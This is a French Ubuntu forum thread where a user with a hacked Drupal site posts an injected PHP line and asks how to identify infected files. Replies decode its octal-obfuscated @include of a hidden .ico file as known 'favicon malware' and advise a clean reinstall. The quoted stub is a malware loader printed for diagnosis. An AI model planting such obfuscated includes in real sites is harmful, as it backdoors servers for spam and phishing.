Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#1 Le 01/09/2019, à 14:48

emena

Identifier les fichiers vérolés

Bonjour,

Je me retrouve avec un virus sur mon serveur (une faille drupal, je n'ai pas fait la mis à jour à temps sadmad:(:o:o)

je me retouve avec des fichiers bizarre comme

<?php
/*75b97*/
@include "\057s\162v\057d\141t\141/\167e\142/\166h\157s\164s\057h\141s\163o\165n\056b\145/\150t\144o\143s\057s\153i\156s\057V\151o\154i\156e\057.\1428\064f\0671\1453\056i\143o";
/*75b97*/
echo @file_get_contents('index.htm.bak.bak');

Comment savoir s'il sont des virus, je ne vois pas ce que ça pourrait être d'autres et comment les identifier dans une grande masse de fichier ?
Je suis perdue et inquiète, votre aide sera la bien venue.
Merci d'avance
EM

Dernière modification par emena (Le 01/09/2019, à 14:48)


Ubuntu 22.04.4 LTS

Hors ligne

#2 Le 01/09/2019, à 15:37

bruno

Re : Identifier les fichiers vérolés

Bonjour,

Une faille dans ton Drupal a permis l'injection de code dans un ou plusieurs fichiers PHP

Pour information la ligne indiquée fait en réalité :
   

@include " /srv/data/web/vhosts/hassoun.be/htdocs/skins/Violine/.b84f71e3.ico";

Dans la mesure où tu ne sais pas jusqu'à quel point le site, voire le serveur, a été compromis., je te conseille une réinstallation complète.

Si tu es sûre que seul Drupal a été touché, une réinstallation de Drupal suffira.

Hors ligne

#3 Le 01/09/2019, à 15:40

pingouinux

Re : Identifier les fichiers vérolés

Bonjour,
Cette ligne

@include "\057s\162v\057d\141t\141/\167e\142/\166h\157s\164s\057h\141s\163o\165n\056b\145/\150t\144o\143s\057s\153i\156s\057V\151o\154i\156e\057.\1428\064f\0671\1453\056i\143o";

correspond à ceci

@include /srv/data/web/vhosts/hassoun.be/htdocs/skins/Violine/.b84f71e3.ico

Je ne peux pas en dire plus, et ne sais pas pourquoi 1 caractère sur 2 est codé en octal.

Hors ligne

#4 Le 01/09/2019, à 15:56

bruno

Re : Identifier les fichiers vérolés

Mon message s'est croisé avec celui de pingouinux wink

Bon, c'est un mode d'infection qui n'est franchement pas récent (plusieurs années) connu sous différent noms : favicon malware, bak.bak, etc.
Il est donc probable que le sites soit infecté depuis longtemps, permettant du spam, phishing et autres joyeusetés.

Il faut réinstaller le serveur, puis réinstaller Drupal à partir des sources officielles et enfin restaurer la base de données à partir d'une sauvegarde propre.

Un exemple de la même infection il y a plus de deux ans : https://stackoverflow.com/questions/432 … ow-do-i-ge

Hors ligne

#5 Le 01/09/2019, à 17:24

emena

Re : Identifier les fichiers vérolés

Hello,

Mille merci, et honte sur moi de ne pas avoir pensé à décoder des bytes :lol: :lol:

Je vais suivre la démarche ici, ça correspond tout à fait à ce que j'ai.

Je vous dis quoi
EM

Dernière modification par emena (Le 01/09/2019, à 17:24)


Ubuntu 22.04.4 LTS

Hors ligne